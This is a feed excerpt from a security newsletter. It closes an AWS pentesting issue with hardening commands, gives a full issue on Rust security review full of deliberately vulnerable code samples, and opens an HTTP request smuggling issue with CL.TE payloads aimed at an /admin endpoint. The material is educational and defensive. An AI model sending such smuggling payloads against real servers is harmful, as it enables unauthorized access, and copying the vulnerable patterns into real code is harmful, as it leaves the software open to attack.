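  --lookup-attributes AttributeKey=EventName,AttributeValue=AssumeRole \
  --max-results 20 \
  --query &apos;Events[].{Time:EventTime,User:Username,Source:EventSource}&apos;
```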

**2. Enable S3 Block Public Access**

At the account level:
```bash
aws s3control put-public-access-block \
  --account-id &lt;account-id&gt; \
  --public-access-block-configuration BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true
```

**3. Enforce IMDSv2**

Disable IMDSv1 on all EC2 instances:
```bash
aws ec2 modify-instance-metadata-options \
  --instance-id i-1234567890abcdef0 \
  --http-tokens required \
  --http-endpoint enabled
```

**4. Use AWS IAM Access Analyzer**

Automatically identifies resources shared with external entities:
```bash
aws accessanalyzer create-analyzer --analyzer-name my-analyzer --type ACCOUNT
```

**5. Implement Least Privilege IAM Policies**

Avoid wildcard permissions:
```json
{
  &quot;Effect&quot;: &quot;Allow&quot;,
  &quot;Action&quot;: &quot;*&quot;,
  &quot;Resource&quot;: &quot;*&quot;
}
```

Instead, grant specific permissions:
```json
{
  &quot;Effect&quot;: &quot;Allow&quot;,
  &quot;Action&quot;: [&quot;s3:GetObject&quot;, &quot;s3:PutObject&quot;],
  &quot;Resource&quot;: &quot;arn:aws:s3:::my-bucket/*&quot;
}
```

**6. Enable MFA for IAM Users**

Require MFA for console access and sensitive API calls.
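
One common way to enforce this is a deny-by-default IAM policy statement that blocks all actions whenever no MFA is present (a widely used pattern; adapt the scope to your environment):

```json
{
  &quot;Effect&quot;: &quot;Deny&quot;,
  &quot;Action&quot;: &quot;*&quot;,
  &quot;Resource&quot;: &quot;*&quot;,
  &quot;Condition&quot;: {
    &quot;BoolIfExists&quot;: { &quot;aws:MultiFactorAuthPresent&quot;: &quot;false&quot; }
  }
}
```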

**7. Rotate Access Keys Regularly**

Old, forgotten access keys are a common entry point.
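
Stale keys are easy to surface from the CLI. This sketch (user and key IDs are placeholders) lists each key for a user and when it was last used:

```bash
# Enumerate keys for a user, then check last-use timestamps
aws iam list-access-keys --user-name &lt;user&gt;
aws iam get-access-key-last-used --access-key-id &lt;key-id&gt;
```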

**8. Use AWS Config**

Monitor resource configuration changes and compliance:
```bash
aws configservice put-configuration-recorder \
  --configuration-recorder name=default,roleARN=arn:aws:iam::account:role/config-role
```

### For Developers

**Secure S3 Buckets:**
- Never make buckets public unless absolutely necessary
- Use bucket policies with specific IP restrictions
- Enable versioning and logging
- Use pre-signed URLs for temporary access
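
Pre-signed URLs can be generated directly from the CLI. This example (bucket, object, and expiry are illustrative) grants one hour of read access to a single object without touching the bucket policy:

```bash
# URL expires after 3600 seconds; no bucket policy change needed
aws s3 presign s3://my-bucket/report.pdf --expires-in 3600
```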

**Protect Against SSRF:**
- Validate and sanitize all URLs
- Use allowlists, not denylists
- Block access to metadata service (`169.254.169.254`)
- Implement network-level controls

**Don&apos;t Hardcode Credentials:**
- Use IAM roles for EC2/Lambda
- Use AWS Secrets Manager or Parameter Store
- Never commit credentials to git
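
A cheap guardrail is running a secret scanner before every commit. This is a sketch of a `.pre-commit-config.yaml` using the gitleaks pre-commit hook (pin `rev` to the release you actually use):

```yaml
repos:
  - repo: https://github.com/gitleaks/gitleaks
    rev: v8.18.4
    hooks:
      - id: gitleaks
```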

## 🎯 Key Takeaways

- **AWS is not inherently insecure, but misconfigurations are everywhere**
- **S3 buckets are the most common AWS vulnerability** due to public access misconfigurations
- **SSRF to EC2 metadata service can leak IAM credentials**, granting access to other AWS resources
- **You don&apos;t need AWS credentials to enumerate many resources** via DNS, certificate transparency, and public APIs
- **Subdomain takeovers via S3 are common** when DNS records point to non-existent buckets
- **IMDSv2 makes metadata exploitation harder** but not impossible
- **Defense requires proactive monitoring, least privilege IAM, and blocking public access by default**
- **CloudTrail, Config, and IAM Access Analyzer are essential** for visibility and compliance

## 📚 Further Reading

- **[flAWS.cloud](http://flaws.cloud/)**: Hands-on AWS security challenges (free)
- **[AWS Security Best Practices](https://docs.aws.amazon.com/security/)**: Official AWS security documentation
- **[Rhino Security Labs AWS Pentesting Resources](https://rhinosecuritylabs.com/aws-pentesting/)**: Detailed guides on AWS exploitation techniques
- **[HackTricks Cloud SSRF](https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html)**: AWS metadata service exploitation techniques
- **[HackTricks S3 Buckets](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/buckets)**: S3 enumeration and exploitation guide
- **[AWS IAM Policy Simulator](https://policysim.aws.amazon.com/)**: Test IAM policies before deployment
- **[CloudGoat Documentation](https://github.com/RhinoSecurityLabs/cloudgoat)**: Vulnerable AWS environment setup
- **[AWS IMDSv2 Documentation](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html)**: Official guide on securing metadata service

---

That&apos;s it for this week!

If you&apos;ve been avoiding AWS pentesting because it felt overwhelming, I hope this demystifies it. Start simple. Enumerate S3 buckets on your next target. Test for SSRF and try hitting the metadata service. Use the free flAWS.cloud labs to practice.

Cloud security is a massive field, but you don&apos;t need to know everything to find high-impact vulnerabilities. Focus on the basics: S3, IAM, and SSRF. You&apos;ll be surprised how often these simple techniques work.

Thanks for reading, and happy hacking ☁️

— Ruben</content:encoded><category>Newsletter</category><category>cloud-security</category><author>Ruben Santos</author></item><item><title>Rust Security Code Review: When Memory Safety Isn&apos;t Enough</title><link>https://www.kayssel.com/newsletter/issue-27</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-27</guid><description>How to find vulnerabilities in Rust codebases despite the borrow checker, from unsafe blocks to logic bugs the compiler can&apos;t catch</description><pubDate>Sun, 07 Dec 2025 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

On November 18, 2025, [Cloudflare went down and took half the Internet with it](https://blog.cloudflare.com/18-november-2025-outage/). ChatGPT stopped responding. Claude returned errors. Shopify, Uber, Dropbox. All showing 5xx errors for hours. The culprit? A single line of Rust code.

```rust
.unwrap()
```

That&apos;s it. One `.unwrap()` in production code that assumed &quot;this will never happen.&quot; But it did happen. A configuration file doubled in size. The code panicked. And [330+ data centers across the globe stopped serving traffic](https://medium.com/@lordmoma/trust-me-bro-the-cloudflare-rust-unwrap-that-panicked-across-330-data-centers-a29f33ef1ba9).

This incident got me digging deeper into Rust security. I&apos;ve been studying Rust for blockchain work (Solana programs, mostly) and kept hearing the same mantra: &quot;It&apos;s memory safe, so it&apos;s secure.&quot; But the Cloudflare outage proved what I suspected. Memory safety doesn&apos;t mean security.

After going through the [postmortem](https://blog.cloudflare.com/18-november-2025-outage/), analyzing similar incidents, and reviewing Rust CVEs, I realized Rust has security problems that most developers don&apos;t talk about. Panics that cause DoS. Integer overflows that wrap silently in release mode. Logic bugs the compiler can&apos;t catch. And `unsafe` blocks where all bets are off.

Rust is being adopted everywhere. The Linux kernel, Android, Windows components, Solana smart contracts, crypto wallets, embedded systems. As Rust codebases grow, so does the attack surface. And most developers assume the compiler catches everything. It doesn&apos;t.

The worst part? Traditional security tools designed for C/C++ don&apos;t understand Rust&apos;s semantics. And auditors trained on memory corruption bugs often miss the subtle logic flaws that Rust allows.

In this issue, we&apos;ll cover:
- Common security vulnerabilities in Rust code
- The dangers hiding in `unsafe` blocks
- Integer overflow and underflow exploitation
- Panic-based denial of service attacks
- Logic bugs the borrow checker can&apos;t catch
- FFI security pitfalls
- Tools and techniques for Rust security audits
- Defense strategies and secure coding patterns

If you&apos;re auditing Rust code, building Rust applications, or just curious about the security landscape beyond memory safety, this is essential knowledge.

Let&apos;s break some assumptions 👇

## 🔍 The Myth of Complete Safety

Let&apos;s be clear about what Rust guarantees and what it doesn&apos;t.

### What Rust Prevents

**Memory Safety**:
```rust
// This won&apos;t compile
let mut v = vec![1, 2, 3];
let first = &amp;v[0];
v.push(4);  // Error: can&apos;t mutate while borrowed
println!(&quot;{}&quot;, first);
```

The borrow checker catches this at compile time. No dangling pointers, no data races.

**Thread Safety**:
```rust
// This won&apos;t compile
let mut data = vec![1, 2, 3];
std::thread::spawn(move || {
    data.push(4);
});
data.push(5);  // Error: value moved
```

Rust&apos;s ownership system prevents data races by construction.

### What Rust Doesn&apos;t Prevent

**Logic Bugs**:
```rust
// Compiles fine, logic is wrong
fn withdraw(balance: &amp;mut u64, amount: u64) -&gt; bool {
    *balance -= amount;  // VULNERABILITY: No balance check at all
    true
}
```

The borrow checker doesn&apos;t care about business logic. If `amount &gt; *balance`, this subtraction underflows: it panics in debug builds and silently wraps to a huge value in release builds.

**Integer Overflow** (in release mode):
```rust
// Compiles fine, overflows in production
fn calculate_fee(price: u64) -&gt; u64 {
    price * 10 / 100  // VULNERABILITY: Can overflow
}
```

In debug builds, this panics. In release builds, it wraps silently.

**Panic-Based DoS**:
```rust
// Compiles fine, panics on invalid input
fn process(data: &amp;[u8]) {
    let value = data[0];  // VULNERABILITY: Panics if data is empty
    // ...
}
```

Out-of-bounds access panics instead of corrupting memory. But a panic can still take down your service.

## 🧨 Unsafe Rust: Where Dragons Live

The `unsafe` keyword is Rust&apos;s escape hatch. It disables the borrow checker for specific operations. And that&apos;s where memory corruption bugs can still hide.

### When Unsafe Is Necessary

Rust requires `unsafe` for:
- Dereferencing raw pointers
- Calling `unsafe` functions
- Implementing `unsafe` traits
- Accessing mutable statics
- FFI calls to C/C++ code

**Legitimate use**:
```rust
unsafe fn read_volatile_register(addr: usize) -&gt; u32 {
    std::ptr::read_volatile(addr as *const u32)
}
```

This is necessary for hardware interaction. But it&apos;s also where bugs creep in.

### Vulnerable Unsafe Code

**Unvalidated Pointer Dereference**:
```rust
// VULNERABILITY: No bounds checking
unsafe fn get_element(ptr: *const u32, index: usize) -&gt; u32 {
    *ptr.add(index)  // Can read arbitrary memory
}
```

If `index` is attacker-controlled, this is a memory disclosure vulnerability.

**Use-After-Free**:
```rust
// VULNERABILITY: Dangling pointer
let mut data = Box::new(42);
let ptr = &amp;*data as *const i32;
drop(data);  // Memory freed
unsafe {
    println!(&quot;{}&quot;, *ptr);  // Use-after-free
}
```

Inside `unsafe`, Rust can&apos;t protect you.

**Incorrect Lifetime Assumptions**:
```rust
// VULNERABILITY: Returns dangling reference
unsafe fn dangling_ref&lt;&apos;a&gt;() -&gt; &amp;&apos;a str {
    let s = String::from(&quot;temp&quot;);
    std::mem::transmute::&lt;&amp;str, &amp;&apos;a str&gt;(s.as_str())
    // s is dropped, reference is dangling
}
```

Using `transmute` to lie about lifetimes bypasses safety checks.

## 🔢 Integer Overflow and Underflow

Rust&apos;s integer behavior changes between debug and release builds.

### Debug vs Release Mode

**Debug mode** (default for `cargo build`):
```rust
fn increment(x: u8) -&gt; u8 {
    x + 1  // increment(255) panics: attempt to add with overflow
}
```

**Release mode** (`cargo build --release`):
```rust
fn increment(x: u8) -&gt; u8 {
    x + 1  // increment(255) wraps to 0, no panic
}
```

(With constant operands like `255u8 + 1`, rustc rejects the overflow at compile time, so the difference only shows up for values computed at runtime.)

This is dangerous. Code tested in debug mode can silently misbehave in production.

### Exploitable Overflow

**Token Balance Calculation**:
```rust
// VULNERABILITY: Overflow in fee calculation
fn calculate_total(price: u64, quantity: u32) -&gt; u64 {
    price * (quantity as u64)  // Can overflow
}

// Attacker sets quantity = u32::MAX
// price * quantity wraps, total becomes tiny
```

In a marketplace, this could let attackers buy expensive items for pennies.

### Safe Alternatives

**Checked arithmetic**:
```rust
fn safe_multiply(a: u64, b: u64) -&gt; Result&lt;u64, &amp;&apos;static str&gt; {
    a.checked_mul(b).ok_or(&quot;Overflow&quot;)
}
```

**Saturating arithmetic**:
```rust
fn safe_add(a: u64, b: u64) -&gt; u64 {
    a.saturating_add(b)  // Clamps to u64::MAX instead of wrapping
}
```

**Wrapping arithmetic** (explicit):
```rust
fn intentional_wrap(a: u8, b: u8) -&gt; u8 {
    a.wrapping_add(b)  // Makes wrapping behavior explicit
}
```

Use `checked_*`, `saturating_*`, or `wrapping_*` methods. Never rely on default overflow behavior in security-critical code.

## 💥 Panic-Based Denial of Service

Panics in Rust are like exceptions in other languages, but with a key difference: by default, panics unwind the stack and terminate the thread. In single-threaded services, that means the entire service crashes.

### Panic Sources

**Array Indexing**:
```rust
// VULNERABILITY: Panics if index is out of bounds
fn get_user_score(scores: &amp;[u32], user_id: usize) -&gt; u32 {
    scores[user_id]  // Panics if user_id &gt;= scores.len()
}
```

If `user_id` comes from user input, an attacker can crash the service.

**Unwrap and Expect**:
```rust
// VULNERABILITY: Panics if input is invalid
fn parse_config(json: &amp;str) -&gt; Config {
    serde_json::from_str(json).unwrap()  // Panics on invalid JSON
}
```

Any malformed input crashes the application.

**Division by Zero**:
```rust
// VULNERABILITY: Panics if denominator is zero
fn calculate_ratio(numerator: u64, denominator: u64) -&gt; u64 {
    numerator / denominator  // Panics if denominator == 0
}
```

**Slice Operations**:
```rust
// VULNERABILITY: Panics if range is invalid
fn extract_header(data: &amp;[u8]) -&gt; &amp;[u8] {
    &amp;data[0..20]  // Panics if data.len() &lt; 20
}
```

### Real-World Example: Solana Programs

Solana smart contracts (programs) are written in Rust. A panic in a program causes the transaction to fail. Attackers can use this for griefing attacks:

```rust
// Vulnerable Solana program
pub fn process_instruction(accounts: &amp;[AccountInfo], data: &amp;[u8]) -&gt; ProgramResult {
    // VULNERABILITY: Panics if data.len() &lt; 8
    let amount_bytes: [u8; 8] = data[0..8].try_into().unwrap();
    let amount = u64::from_le_bytes(amount_bytes);
    // If data is shorter than 8 bytes, this panics
    // Transaction fails, attacker can DoS the program
    Ok(())
}
```

### Safe Alternatives

Use safe accessors:
```rust
// Safe: Returns None instead of panicking
fn get_user_score_safe(scores: &amp;[u32], user_id: usize) -&gt; Option&lt;u32&gt; {
    scores.get(user_id).copied()
}

// Safe: Returns Result
fn parse_config_safe(json: &amp;str) -&gt; Result&lt;Config, serde_json::Error&gt; {
    serde_json::from_str(json)
}

// Safe: Explicit check
fn calculate_ratio_safe(numerator: u64, denominator: u64) -&gt; Option&lt;u64&gt; {
    if denominator == 0 {
        None
    } else {
        Some(numerator / denominator)
    }
}
```

**Rule of thumb**: In production code, avoid `unwrap()`, `expect()`, direct indexing, and unchecked arithmetic. Use `?`, `match`, `if let`, and `get()`.

## 🔗 FFI: The Unsafe Boundary

Foreign Function Interface (FFI) allows Rust to call C/C++ code. This is necessary for interacting with existing libraries, but it&apos;s also where Rust&apos;s guarantees end.

### FFI Vulnerabilities

**Unvalidated C Strings**:
```rust
use std::ffi::{CStr, c_char};

// VULNERABILITY: No validation of C string
unsafe fn call_c_function(input: *const c_char) {
    let c_str = CStr::from_ptr(input);  // UNSAFE: Assumes input is valid &amp; null-terminated
    // If input is not null-terminated, this can read past buffer
    let rust_str = c_str.to_str().unwrap();
}
```

**Buffer Overflow via C**:
```rust
extern &quot;C&quot; {
    fn unsafe_copy(dest: *mut u8, src: *const u8, len: usize);
}

// VULNERABILITY: C function doesn&apos;t check bounds
unsafe fn copy_data(dest: &amp;mut [u8], src: &amp;[u8]) {
    unsafe_copy(dest.as_mut_ptr(), src.as_ptr(), src.len());
    // If src.len() &gt; dest.len(), buffer overflow
}
```

**Type Confusion**:
```rust
// VULNERABILITY: C function expects different layout
struct Item {
    id: u32,
    value: u64,
}

#[repr(C)]
struct Data {
    count: u32,
    items: *mut Item,
}

// If C code expects different field order or alignment, memory corruption
```

### Safe FFI Practices

1. **Validate all inputs** before passing to C:
```rust
fn safe_c_string(s: &amp;str) -&gt; Result&lt;CString, NulError&gt; {
    CString::new(s)  // Validates no null bytes in middle
}
```

2. **Check buffer sizes** before calling C:
```rust
unsafe fn safe_copy(dest: &amp;mut [u8], src: &amp;[u8]) -&gt; Result&lt;(), &amp;&apos;static str&gt; {
    if src.len() &gt; dest.len() {
        return Err(&quot;Buffer too small&quot;);
    }
    unsafe_copy(dest.as_mut_ptr(), src.as_ptr(), src.len());
    Ok(())
}
```

3. **Use `#[repr(C)]`** for FFI structs:
```rust
#[repr(C)]  // Ensures C-compatible layout
struct FfiData {
    x: u32,
    y: u64,
}
```

4. **Never trust C code**: Assume C functions can violate Rust&apos;s invariants. Validate everything.

## 🐛 Logic Bugs the Compiler Can&apos;t Catch

These are the vulnerabilities that make Rust codebases just as vulnerable as any other language when it comes to application logic.

### Authentication Bypass

```rust
// VULNERABILITY: Logic error in authentication
fn authenticate(username: &amp;str, password: &amp;str, stored_hash: &amp;str) -&gt; bool {
    let hash = compute_hash(password);
    hash == stored_hash  // VULNERABILITY: No error handling
}

// Usage
if authenticate(&quot;admin&quot;, user_input, stored) {
    grant_access();
}

// If compute_hash() swallows errors and returns an empty string,
// any account whose stored hash is also empty (e.g. never set)
// can be bypassed by triggering the error condition
```

### Race Conditions

Rust prevents data races, but not logical race conditions:

```rust
use std::sync::{Arc, Mutex};

struct Account {
    balance: u64,
}

// VULNERABILITY: Time-of-check to time-of-use (TOCTOU)
fn withdraw(account: &amp;Arc&lt;Mutex&lt;Account&gt;&gt;, amount: u64) -&gt; bool {
    let balance = {
        let acc = account.lock().unwrap();
        acc.balance  // Check
    };

    if balance &gt;= amount {
        // VULNERABILITY: Another thread can withdraw between check and use
        std::thread::sleep(std::time::Duration::from_millis(100));

        let mut acc = account.lock().unwrap();
        acc.balance -= amount;  // Use
        true
    } else {
        false
    }
}
```

Two threads can both pass the check and double-spend the balance.

### Incorrect Access Control

```rust
// VULNERABILITY: Missing permission check
fn delete_post(post_id: u64, user_id: u64) -&gt; Result&lt;(), &amp;&apos;static str&gt; {
    let post = get_post(post_id)?;
    // VULNERABILITY: Never checks if user_id owns post
    delete_from_db(post_id);
    Ok(())
}
```

The function compiles. The types are correct. But the authorization logic is missing.

### Cryptographic Misuse

```rust
// VULNERABILITY: Token too short
fn generate_session_token() -&gt; String {
    use rand::Rng;
    let mut rng = rand::thread_rng();
    format!(&quot;{:x}&quot;, rng.gen::&lt;u64&gt;())  // VULNERABILITY: Only 64 bits (8 bytes)
}
```

While `thread_rng()` is cryptographically secure, a 64-bit token is too short for session tokens (only 2^64 possible values). Secure session tokens should be at least 128 bits (16 bytes). Use proper token generation with sufficient entropy:

```rust
use rand::Rng;

fn generate_session_token() -&gt; String {
    let mut rng = rand::thread_rng();
    let token: [u8; 32] = rng.gen();  // 256 bits
    hex::encode(token)  // Requires: hex = &quot;0.4&quot; in Cargo.toml
}
```

## 🛠️ Tools of the Trade

For general-purpose code review tools like Semgrep, CodeQL, and static analysis fundamentals, check out [Issue #16](/post/issue-16) where we covered secure code review tooling in depth. Here, we&apos;ll focus on Rust-specific security tools.

**Rust-Specific Static Analysis:**

**[Clippy](https://github.com/rust-lang/rust-clippy)**: Official Rust linter with security-focused rules.
```bash
cargo clippy -- -W clippy::all -W clippy::pedantic
```

**[cargo-audit](https://github.com/rustsec/rustsec/tree/main/cargo-audit)**: Checks dependencies for known vulnerabilities.
```bash
cargo install cargo-audit
cargo audit
```

**[cargo-deny](https://github.com/EmbarkStudios/cargo-deny)**: Lints for dependency licenses, sources, security advisories.
```bash
cargo install cargo-deny
cargo deny check
```

**[cargo-geiger](https://github.com/geiger-rs/cargo-geiger)**: Detects usage of `unsafe` in dependencies.
```bash
cargo install cargo-geiger
cargo geiger
```

**Rust-Specific Dynamic Analysis:**

**[cargo-fuzz](https://github.com/rust-fuzz/cargo-fuzz)**: Fuzzing for Rust using libFuzzer.
```bash
cargo install cargo-fuzz
cargo fuzz init
cargo fuzz run target_name
```

**[American Fuzzy Lop (AFL)](https://github.com/rust-fuzz/afl.rs)**: AFL fuzzer for Rust.

**[Miri](https://github.com/rust-lang/miri)**: Interpreter that detects undefined behavior and memory errors.
```bash
rustup component add miri
cargo miri test
```

**Manual Review Tools:**

**[ripgrep](https://github.com/BurntSushi/ripgrep)**: Fast grep for finding patterns.
```bash
rg &quot;unsafe|unwrap|expect|panic&quot; src/
```

**[tokei](https://github.com/XAMPPRocky/tokei)**: Count lines of code, useful for scoping reviews.
```bash
cargo install tokei
tokei src/
```

## 🔒 Defense and Detection

### For Developers

**1. Enable Overflow Checks in Release Mode**

By default, release builds don&apos;t check for overflow. Enable them:
```toml
[profile.release]
overflow-checks = true
```

**2. Use Strict Clippy Lints**

Add to `.cargo/config.toml`:
```toml
[target.&apos;cfg(all())&apos;]
rustflags = [
    &quot;-W&quot;, &quot;clippy::unwrap_used&quot;,
    &quot;-W&quot;, &quot;clippy::expect_used&quot;,
    &quot;-W&quot;, &quot;clippy::panic&quot;,
    &quot;-W&quot;, &quot;clippy::indexing_slicing&quot;,
]
```

**3. Minimize Unsafe Code**

Isolate `unsafe` blocks in dedicated modules. Document invariants:
```rust
/// SAFETY: Caller must ensure `ptr` is valid for `len` bytes
/// and that the underlying data outlives &apos;a
unsafe fn read_bytes&lt;&apos;a&gt;(ptr: *const u8, len: usize) -&gt; &amp;&apos;a [u8] {
    std::slice::from_raw_parts(ptr, len)
}
```

**4. Use Result Instead of Panic**

Replace `unwrap()` with proper error handling:
```rust
// Bad
let value = map.get(&quot;key&quot;).unwrap();

// Good
let value = map.get(&quot;key&quot;).ok_or(&quot;Key not found&quot;)?;
```

**5. Test with Miri**

Run tests under Miri to detect undefined behavior:
```bash
cargo miri test
```

**6. Fuzz Critical Code Paths**

Use `cargo-fuzz` on parsing, deserialization, and crypto code:
```rust
#[cfg(fuzzing)]
pub fn fuzz_parse(data: &amp;[u8]) {
    let _ = parse_message(data);
}
```

**7. Enable Security-Focused Features**

```toml
[dependencies]
serde = { version = &quot;1.0&quot;, features = [&quot;derive&quot;] }

[profile.dev]
panic = &quot;abort&quot;  # Abort on panic: surfaces panics immediately during development

[profile.release]
panic = &quot;abort&quot;  # Smaller binary, clearer behavior
overflow-checks = true
```

### For Auditors

**Audit Checklist:**

- [ ] Run `cargo geiger` to find all `unsafe` usage
- [ ] Review every `unsafe` block for memory safety
- [ ] Search for `unwrap()`, `expect()`, `panic!()`, `[]` indexing
- [ ] Check integer arithmetic in financial/critical code
- [ ] Verify FFI boundaries are properly validated
- [ ] Look for TOCTOU race conditions in multi-threaded code
- [ ] Verify cryptographic library usage (key generation, randomness)
- [ ] Check authentication and authorization logic
- [ ] Test panic behavior with malformed inputs
- [ ] Run `cargo audit` for known vulnerable dependencies
- [ ] Use Miri on test suite to catch UB

**Red Flags:**
- High percentage of `unsafe` code
- `transmute` usage (lifetime manipulation)
- Manual memory management with `Box::from_raw`, `ptr::write`
- Arithmetic on user-controlled values without checks
- FFI calls without validation
- `panic=&quot;unwind&quot;` in production services

## 🎯 Key Takeaways

- **Memory safety ≠ security**. Rust eliminates memory corruption but allows logic bugs, integer overflow, and panic-based DoS
- **`unsafe` blocks require manual auditing**. The borrow checker is disabled, so all memory safety rules must be verified manually
- **Integer overflow behavior changes** between debug and release builds. Always use `checked_*`, `saturating_*`, or `wrapping_*` methods in security-critical code
- **Panics can cause DoS**. Avoid `unwrap()`, `expect()`, direct indexing, and unchecked operations in production
- **FFI is the danger zone**. Validate all inputs before passing to C/C++ code, never trust C return values
- **Logic bugs are language-agnostic**. Authentication, authorization, race conditions, and crypto misuse exist in Rust too
- **Tooling is essential**. Use `cargo-audit`, `cargo-geiger`, `clippy`, and `miri` as part of your security workflow
- **Rust is evolving**. Stay updated with [RustSec advisories](https://rustsec.org/) and the [Security WG](https://github.com/rust-secure-code/wg)

## 📚 Further Reading

- **[Rust Security Guidelines](https://anssi-fr.github.io/rust-guide/)** (ANSSI): Comprehensive security guide from French cybersecurity agency
- **[RustSec Advisory Database](https://rustsec.org/)**: Curated database of security vulnerabilities in Rust crates
- **[The Rustonomicon](https://doc.rust-lang.org/nomicon/)**: The Dark Arts of Unsafe Rust - official guide to `unsafe` code
- **[Rust Security Working Group](https://github.com/rust-secure-code/wg)**: Community working group focused on Rust security
- **[Memory-Safety Challenge Considered Solved?](https://arxiv.org/abs/2003.03296)**: Academic study analyzing all Rust CVEs through 2020, showing that memory-safety bugs require unsafe code
- **[Understanding Memory and Thread Safety Practices](https://songlh.github.io/paper/rust-study.pdf)**: Research paper analyzing 70 real-world Rust memory-safety issues
- **[Solana Security Best Practices](https://github.com/coral-xyz/sealevel-attacks)**: Security patterns for Rust-based smart contracts

---

That&apos;s it for this week!

If you&apos;re building or auditing Rust code, don&apos;t assume the compiler catches everything. Spend time reviewing `unsafe` blocks, checking integer arithmetic, and testing panic scenarios. The memory safety is real, but the security depends on you.

Thanks for reading, and happy hacking 🔐

— Ruben</content:encoded><category>Newsletter</category><category>code-review</category><author>Ruben Santos</author></item><item><title>HTTP Request Smuggling: The Art of Confusing Web Servers</title><link>https://www.kayssel.com/newsletter/issue-26</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-26</guid><description>How attackers exploit parsing discrepancies between frontend and backend servers to bypass security controls, poison caches, and hijack sessions</description><pubDate>Sun, 30 Nov 2025 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

HTTP Request Smuggling has been on my radar since I first read [James Kettle&apos;s research](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn) at PortSwigger. The concept seemed almost too elegant. You exploit the difference in how two servers parse HTTP requests. The frontend sees one request, the backend sees two. Suddenly you&apos;re bypassing WAFs, poisoning caches, and stealing sessions.

What makes this attack fascinating is its subtlety. You&apos;re not exploiting a bug in the traditional sense. You&apos;re exploiting ambiguity in how HTTP specifications are implemented. Different servers interpret the same request differently. And that discrepancy becomes your attack surface.

Here&apos;s the thing. HTTP Request Smuggling has been around since 2005. Yet it remains &quot;everywhere and massively under-researched&quot; according to Kettle. In 2024 and 2025, researchers continue to find new variants affecting major platforms. Google Cloud. Apache. ASP.NET Core. Even Akamai&apos;s own infrastructure. The attack surface keeps growing.

The worst part? Traditional security scanners often miss these vulnerabilities entirely. The requests look legitimate. The responses seem normal. But behind the scenes, you&apos;re injecting requests that bypass every security control in the path.

In this issue, we&apos;ll cover:
- How HTTP parsing discrepancies create smuggling opportunities
- CL.TE, TE.CL, and newer variants like TE.0
- Detecting and exploiting smuggling vulnerabilities
- Cache poisoning and session hijacking techniques
- HTTP/2 downgrade attacks and H2C smuggling
- Recent CVEs including the critical ASP.NET Core vulnerability
- Defense strategies that actually work

If you&apos;re testing web applications behind reverse proxies or CDNs, this is essential knowledge.

Let&apos;s confuse some servers 👇

## 🎯 Why Request Smuggling Matters

Request smuggling attacks exploit the fundamental way HTTP connections work. When you have a frontend server (reverse proxy, load balancer, CDN) and a backend server, they need to agree on where one request ends and the next begins. If they disagree, an attacker can inject a second request that only the backend sees.

**Impact**:
- **Bypass Security Controls**: WAFs and access controls only see the first request. The smuggled request flies under the radar.
- **Poison Web Caches**: Force the cache to store malicious content for legitimate URLs.
- **Steal User Sessions**: Capture other users&apos; requests by leaving a partial request on the connection.
- **Gain Unauthorized Access**: Access admin endpoints that the frontend would normally block.

The attack works because [HTTP/1.1 allows persistent connections](https://datatracker.ietf.org/doc/html/rfc7230#section-6.3). Multiple requests flow through the same TCP connection. If the frontend and backend disagree on request boundaries, chaos ensues.

## 🔍 Understanding HTTP Request Length

HTTP/1.1 provides two ways to specify request body length:

### Content-Length Header

```http
POST / HTTP/1.1
Host: target.com
Content-Length: 13

Hello, World!
```

The `Content-Length` header tells the server exactly how many bytes to read. Simple and straightforward.

### Transfer-Encoding: chunked

```http
POST / HTTP/1.1
Host: target.com
Transfer-Encoding: chunked

b
Hello World
0

```

Chunked encoding sends data in pieces. Each chunk starts with its size in hexadecimal, followed by the data. A chunk of size `0` signals the end.
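To make the framing concrete, here is a minimal Python sketch (illustrative, not a production HTTP parser) that encodes and decodes a chunked body:

```python
def chunk_encode(body, chunk_size=5):
    # Split the body into chunks: hex size, CRLF, data, CRLF
    out = b""
    for i in range(0, len(body), chunk_size):
        piece = body[i:i + chunk_size]
        out += format(len(piece), "x").encode() + b"\r\n" + piece + b"\r\n"
    # A zero-size chunk terminates the body
    return out + b"0\r\n\r\n"

def chunk_decode(stream):
    # Re-assemble the original body from a chunked stream
    body = b""
    pos = 0
    while True:
        line_end = stream.index(b"\r\n", pos)
        size = int(stream[pos:line_end], 16)
        if size == 0:
            return body
        data_start = line_end + 2
        body += stream[data_start:data_start + size]
        pos = data_start + size + 2  # skip chunk data and trailing CRLF

# The example above: "Hello World" is 11 bytes, 0xb in hex
encoded = chunk_encode(b"Hello World", chunk_size=11)
assert encoded == b"b\r\nHello World\r\n0\r\n\r\n"
assert chunk_decode(encoded) == b"Hello World"
```

Round-tripping a body through these two functions is a quick sanity check when building smuggling payloads by hand.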

**The Problem**: What happens when a request includes both headers? The [HTTP specification (RFC 7230)](https://datatracker.ietf.org/doc/html/rfc7230#section-3.3.3) says `Transfer-Encoding` should take precedence. But not every server follows the spec.

## 🧨 Classic Smuggling Variants

### CL.TE (Content-Length / Transfer-Encoding)

The frontend uses `Content-Length`. The backend uses `Transfer-Encoding`.

```http
POST / HTTP/1.1
Host: target.com
Content-Length: 32
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Foo: x
```

**What happens**:

1. Frontend sees `Content-Length: 32` and forwards exactly 32 bytes
2. Backend sees `Transfer-Encoding: chunked`, reads until `0\r\n\r\n`
3. Backend treats `GET /admin HTTP/1.1...` as the start of a new request

The smuggled request to `/admin` bypasses any frontend access controls.
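The disagreement can be modeled in a few lines of Python. The two helpers below (illustrative names) consume the same bytes the way a Content-Length parser and a chunked parser would, showing where each one thinks the request ends:

```python
def consume_by_content_length(body, declared_length):
    # A CL parser takes exactly declared_length bytes; the rest is the next request
    return body[:declared_length], body[declared_length:]

def consume_by_chunked(body):
    # A TE parser reads up to (and including) the 0-size terminator chunk
    terminator = b"0\r\n\r\n"
    end = body.index(terminator) + len(terminator)
    return body[:end], body[end:]

body = b"0\r\n\r\nGET /admin HTTP/1.1\r\nFoo: x"

# Frontend: its Content-Length covers the full body, nothing is left over
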